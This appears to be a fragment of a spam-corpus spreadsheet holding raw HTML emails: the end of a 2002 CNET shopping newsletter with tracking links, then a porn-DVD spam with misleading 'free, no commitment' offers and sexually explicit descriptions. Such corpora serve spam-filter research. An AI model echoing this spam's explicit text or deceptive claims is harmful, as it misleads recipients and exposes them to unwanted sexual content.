  &lt;IMG alt="Also from CNET" height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=2 cellSpacing=0 width=150&gt;&lt;TBODY&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;a href="http://clickthru.online.com/Click?q=23-sFcGINM80CPFn50iAv2Y9ZZvQKFR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=38-bLkmIRM2LJ0rXSXnhJiSUxuD-D9R" &gt;April's tech award&lt;/a&gt;&lt;p&gt;  
 &lt;a href="http://clickthru.online.com/Click?q=4d--URsIKZDQ-sXKXQdaB0S22bbKAeR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgZqHIaydG9TmIKJ15BRyR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt; 
 &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsqtJcfz0x31g9NPmdZPPR" &gt;ZDNet: PeopleSoft &lt;/a&gt; 
 &lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
 &lt;!-- End Vertical Brick--&gt;
 &lt;!-- /Vertical Brick --&gt;
 		&lt;td width=9 rowspan=2&gt;
 			&lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
 				&lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#ffcc00"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;		
 		&lt;/td&gt;
 		&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 				&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 					&lt;tr&gt;
 						&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;
 						&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;		
 		&lt;/td&gt;
 	&lt;/TR&gt;
 &lt;!-- Intro --&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;
 		&lt;/td&gt;
 		&lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;
 		&lt;/td&gt;
 		&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;
 		&lt;/td&gt;
 		&lt;td width=420 bgcolor="#ffffff"&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#FFFFFF"&gt;
 							&lt;tr valign=top&gt;
 								&lt;td width=10&gt;&lt;/td&gt;
 &lt;!-- Prime Feature Head --&gt;
 								&lt;td&gt;
 									&lt;table cellpadding=0 cellspacing=0 border=0 width=400&gt;
 										&lt;tr&gt;
 											&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=6&gt;&lt;/td&gt;
 										&lt;/tr&gt;
 										&lt;tr valign=top&gt;
 											&lt;td align=right width=400&gt;&lt;img src="http://www.cnet.com/b.gif"&gt;&lt;br&gt;
 											&lt;img src="http://www.cnet.com/i/sh/nl/macproducts_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;B&gt;Dear Reader,&lt;/B&gt;&lt;p&gt;
 											Is your Mac acting a bit sluggish? Does is sometimes choke
 on large graphics files or spend more time than ever
 spinning its hard drive?
 &lt;P&gt;
 Adding more RAM to your Mac is an easy way to get the most 
 out of your favorite game and graphics applications. But
 unfortunately, figuring out what type to buy is often both 
 difficult and frustrating. 
 &lt;P&gt;
 CNET's all-in-one &lt;a href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBHtf_9SNVFm8il40AWNdR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt; makes finding the perfect 
 memory easy! Whether you're searching for iBook, iMac, 
 or PowerBook memory, your just a few clicks away from the 
 upgrade you'll need to get your system living up to its
 full potential.
 &lt;P&gt;
 Check out CNET's new &lt;a href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKMEbzdZeGkeHaXeD3gBcR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 								&lt;/table&gt;
 							&lt;/td&gt;
 						&lt;/tr&gt;
 					&lt;/table&gt;
 &lt;br&gt;
 &lt;!--featureprods--&gt;
 			&lt;font face="Arial, Helvetica"&gt;
 				&lt;div style="MARGIN-LEFT: 10px; MARGIN-RIGHT: 10px"&gt;			
 					&lt;img src="http://www.cnet.com/i/sh/nl/featured.gif" alt="Featured" width="150" height="19" border="0"&gt;&lt;br&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#cccccc" width="410"&gt;
 							&lt;tr&gt;
 								&lt;td width="100%"&gt;
 									&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 						&lt;/table&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#ffffff" width="410"&gt;
 							&lt;tr&gt;
 								&lt;td width="100%"&gt;
 									&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="10" border="0"&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 						&lt;/table&gt;	
 &lt;!-- Intro Blurb --&gt;
 						&lt;table cellpadding=0 cellspacing=0 border=0 width=400 align=left&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="4"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=b6-llkUQCKyp1s_8Z5T_PUCch20LgRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8400555_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;	
 								&lt;a href="http://clickthru.online.com/Click?q=cb-CjRIQJsrcgm3nIGyXYHRf_uaHkFR" &gt;&lt;B&gt;Apple iMac&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; PowerPC G4, 800MHz&lt;BR&gt;
 								&amp;#149; DVD-CDRW&lt;BR&gt;
 								&amp;#149; 256MB RAM, 60GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,805&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 									&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 3 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=e1-6RvNQxk2WvkOwxlPhsYK3Awi9qcR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/6602925_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrDgCrPxfYYRGOT9_JmpRR" &gt;&lt;B&gt;Apple Power Mac G4  &lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; PowerPC G4 867MHz&lt;BR&gt;
 								&amp;#149; 128MB SDRAM&lt;BR&gt;
 								&amp;#149; 60GB hard drive&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$1,775&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 &lt;!-- Product 4 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4dZcAD6TGftmZCtvxYhFR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8749847_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzW49GiyKtR-pp7us2Qf9R" &gt;&lt;B&gt;Formac Gallery 1740 (DVI)&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 17.4-inch TFT active matrix&lt;BR&gt;
 								&amp;#149; ADC-to-DVI/USB/Power converter box&lt;BR&gt;
 								&amp;#149; 1,280x1,024 resolution&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$949 &lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 								&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 	&lt;!-- Product 5 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzY4EelvpKNXLTSyPWc3uR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/2544673_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnXKPcorsxoLkkTKhn-yR" &gt;&lt;B&gt;Harman Kardon SoundSticks&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Superior sound quality&lt;BR&gt;
 								&amp;#149; 65 total watts maximum&lt;BR&gt;
 								&amp;#149; 6-inch woofer, USB&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$157&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 							&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2c7-Ra96fez6pa6cIJPR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8928341_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKUAIuAv8oO_rjups7LLZ5eR" &gt;&lt;B&gt;Palm m515&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available&lt;BR&gt;
 								&amp;#149; 16MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; MultiMediaCard slot&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$312&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;			&lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXndaN32JjIO3Nt-tKChBwsR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/ce/ps/120/6886275_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdL3s486IYlcGhVIlcU_ZR" &gt;&lt;B&gt;Canon PowerShot G2&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 4.0-megapixel&lt;BR&gt;
 								&amp;#149; 3x optical/3.6x digital zoom&lt;BR&gt;
 								&amp;#149; 32MB CompactFlash card &lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$649&lt;/font&gt;&lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;		
 						&lt;/table&gt;	
 		&lt;p&gt;	&lt;BR CLEAR=ALL&gt;	
 &lt;!-- center ad --&gt;
 &lt;P&gt;
 &lt;P&gt;
 &lt;!-- /center ad --&gt;
 &lt;p&gt;
 &lt;!--Special Feature--&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/sub_sfeat.gif" alt="Special Feature" width="150" height="19" border="0"&gt;&lt;br&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#cccccc" width="410"&gt;
 					&lt;tr&gt;
 						&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;
 				&lt;table cellpadding=0 cellspacing=0 border=0 bgcolor="#ffffff" width="410"&gt;
 					&lt;tr&gt;
 						&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/i/b.gif" width="1" height="10" border="0"&gt;&lt;/td&gt;
 					&lt;/tr&gt;
 				&lt;/table&gt;	
 				&lt;font face="arial, helvetica"&gt;&lt;font size="-1"&gt;
 Did you know that ChannelOnline enables you to streamline 
 your sales process by building quotes and orders online? 
 &lt;P&gt;
 Simply select a customer you've previously entered into 
 ChannelOnline's database and their company information, 
 and a customized price profile is automatically applied 
 to their quote. You can add products as you search the 
 product database and work on multiple quotes at once as 
 you respond to different customer requests throughout 
 the day. 
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xDckfxgqJzDxDXozLCdR" &gt;&lt;B&gt;Sign up now&lt;/b&gt;&lt;/a&gt; to streamline your entire buying and selling 
 chain. 
 &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkUNzf4fgjg0SxiPZvH6cR" &gt;&lt;B&gt;Tell me more about ChannelOnline.&lt;/b&gt;&lt;/a&gt;
 &lt;!--/Special Feature--&gt;
 &lt;p&gt;
 	&lt;img src="http://www.cnet.com/i/dp/oncnet.gif" alt="On the CNET Network" width="172" height="14" border="0"&gt;&lt;br&gt;
 	&lt;img src="http://www.cnet.com/i/dp/rule2.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 		&lt;table width="100%25" cellpadding=0 cellspacing=0 border=0&gt;&lt;tr valign=top&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWaOAfjtEttTbDS-BJjhoRR" &gt;Tech Trends&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwjRNeMSJCs3CyJqsjeoFR" &gt;Hardware&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFUrP9KmEg3F-erCpGY99R" &gt;Software&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=1d-6KTjIGQF77NmjKKRl28NRQSnqQuR" &gt;Shopping&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6jNJSv9KDFWVhZSgRXBsR" &gt;Downloads&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=47-ADmxIIZH12E_3NEOiJGu_NEsnEPR" &gt;News&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sj9x_wwOobvZm5yGKIaeR" &gt;Investing&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUf029bqz0rqMtNXjoCKqyR" &gt;Electronics&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naPm1EchneplrQ8kasp4ZR" &gt;Web Building&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyk_4O1omlXdIl9Oi-UidR" &gt;Help &amp; How-Tos&lt;/a&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 			&lt;td&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 					&lt;ul&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0dz-rCWShr9i_f_B0NLncR" &gt;Internet&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKgZcthgLWdT_pfmeDx0RR" &gt;Games&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEK6LGmw3zvpmtTwxp6DtFR" &gt;Message Boards&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=f0-nv_DQWg4K4BZ7Zl2fqfAgMcXea9R" &gt;CNET TV &amp; Radio&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8WRwVMNHdfnODtxI8fiiuR" &gt;Music Center&lt;/a&gt;&lt;/li&gt;
 					&lt;/ul&gt;&lt;/b&gt;
 				&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;/p&gt;
 &lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/DIV&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;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is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&lt;p&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=1b-wArhzHN6zV8H5lHY2UHI4cE_R-Sh0sRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=30-u8NEIRrWEtApIg-8IeOdSKzjX19R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKB680bDU0p-EDvznhjonleR"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href="http://clickthru.online.com/Click?q=5a-ahD1IP0IMbPRKKM24YOLpk6Td6yR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOLAbHx8WZt3RXvLF34ULXPR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=84-CCOyQ60Tyzz0AgaZsihsBSWgp7dR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTjIl7vBM2H3f2jvrqULcR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=ae-jOE6QMB1Lk4v1Vb8-mhe2RYEVuRR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLx-_MMLjhZ5znP-FdWuuFR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e441&amp;ISSUE=2002-07-11" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=d9-b7p_-APDUkNn7aFQfoNO23Y8HRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Finally! Sexy DVDs for FREE. Christmas is Great! NMV
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body&gt;&lt;center&gt;
 &lt;table bgcolor=3D"663399" border=3D"2" width=3D"999" cellspacing=3D"0" cel=
 lpadding=3D"0"&gt;
   &lt;tr&gt;
     &lt;td colspan=3D"3" width=3D"999"&gt; &lt;hr&gt;&lt;font color=3D"yellow"&gt; 
 &lt;center&gt;
 &lt;font size=3D"7"&gt; 
 &lt;br&gt;&lt;center&gt;&lt;b&gt;Get 12 FREE VHS or DVDs! &lt;/b&gt;&lt;br&gt;
 &lt;table bgcolor=3D"white" border=3D"2" width=3D"500"&gt;
   &lt;tr&gt;    &lt;td&gt;
  &lt;font size=3D"7"&gt; &lt;font color=3D"003399"&gt;&lt;center&gt;Click &lt;a href=3D"http://=
 www.bozomber.com/porno/index.html"&gt; HERE For Details!&lt;/a&gt;
 &lt;font size=3D"5"&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; 
 &lt;table bgcolor=3D"#CCFF33" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;center&gt;&lt;center&gt;&lt;font size=3D"6"&gt;&lt;font color=3D"6633CC"&gt;&lt;br&gt;
 We Only Have HIGH QUALITY &lt;br&gt;Porno Movies to Choose From!&lt;br&gt;&lt;br&gt;
  "This is a &lt;i&gt;VERY SPECIAL, LIMITED TIME OFFER&lt;/i&gt;."&lt;br&gt;&lt;br&gt; Get up to 12=
  DVDs absolutely FREE,&lt;br&gt; with&lt;a href=3D"http://www.bozomber.com/porno/in=
 dex.html"&gt; NO COMMITMENT!&lt;/a&gt; 
  &lt;br&gt;&lt;br&gt;
 There's &lt;b&gt;no better deal anywhere&lt;/b&gt;.&lt;br&gt;
 There's &lt;i&gt;no catches&lt;/i&gt; and &lt;i&gt;no gimmicks&lt;/i&gt;. &lt;br&gt;You only pay for the=
  shipping,&lt;br&gt; and the DVDs are &lt;b&gt;absolutely free&lt;/b&gt;!&lt;br&gt;&lt;br&gt;
 Take a Peak at our&lt;a href=3D"http://www.bozomber.com/porno/index.html"&gt;  F=
 ull Catalog!&lt;/a&gt; 
  &lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
  &lt;br&gt; &lt;br&gt; 
 &lt;table bgcolor=3D"yellow" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;br&gt;
  &lt;font size=3D"6"&gt; &lt;font color=3D"blue"&gt;
 &lt;center&gt;
  &lt;font size=3D"6"&gt;&lt;b&gt;High quality cum filled titles such as:&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;c=
 enter&gt;
 &lt;a href=3D"http://www.bozomber.com/porno/index.html"&gt;&lt;b&gt; &lt;font size=3D"6"&gt;=
 500 Oral Cumshots 5&lt;/b&gt;&lt;br&gt;&lt;/a&gt;
  &lt;font size=3D"5"&gt;
 &lt;b&gt;&lt;/center&gt;Description:&lt;/b&gt; 500 Oral Cum Shots! I need hot jiz on my face=
 !&lt;br&gt; Will you cum in my mouth?&lt;br&lt;br
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; &lt;br&gt;
 &lt;table bgcolor=3D"yellow" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;br&gt;
  &lt;font size=3D"6"&gt; &lt;font color=3D"blue"&gt;
 &lt;center&gt;
  &lt;font size=3D"6"&gt;&lt;b&gt;Dozens of Dirty Hardcore titles such as:&lt;/b&gt;&lt;br&gt;&lt;br&gt;&lt;=
 center&gt;
 &lt;a href=3D"http://www.bozomber.com/porno/index.html"&gt;&lt;b&gt; &lt;font size=3D"6"&gt;=
 Amazing Penetrations No. 17&lt;/b&gt;&lt;br&gt;&lt;/a&gt;
  &lt;font size=3D"5"&gt;
 &lt;b&gt;&lt;/center&gt;Description:&lt;/b&gt; 4 full hours of amazing penetrations&lt;br&gt; with=
  some of the most beautiful women in porn!&lt;br&lt;br
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; &lt;br&gt; &lt;br&gt;
 &lt;table bgcolor=3D"yellow" border=3D"2" width=3D"600"&gt;
   &lt;tr&gt;    &lt;td&gt;&lt;br&gt;
  &lt;font size=3D"6"&gt; &lt;font color=3D"blue"&gt;
 &lt;center&gt;
  &lt;font size=3D"6"&gt;&lt;b&gt;From our "Sexiest Innocent Blondes" collections:&lt;/b&gt;&lt;=
 br&gt;&lt;br&gt;&lt;center&gt;
 &lt;a href=3D"http://www.bozomber.com/porno/index.html"&gt;&lt;b&gt; &lt;font size=3D"6"&gt;=
 Audition Tapes&lt;/b&gt;&lt;br&gt;&lt;/a&gt;
  &lt;font size=3D"5"&gt;
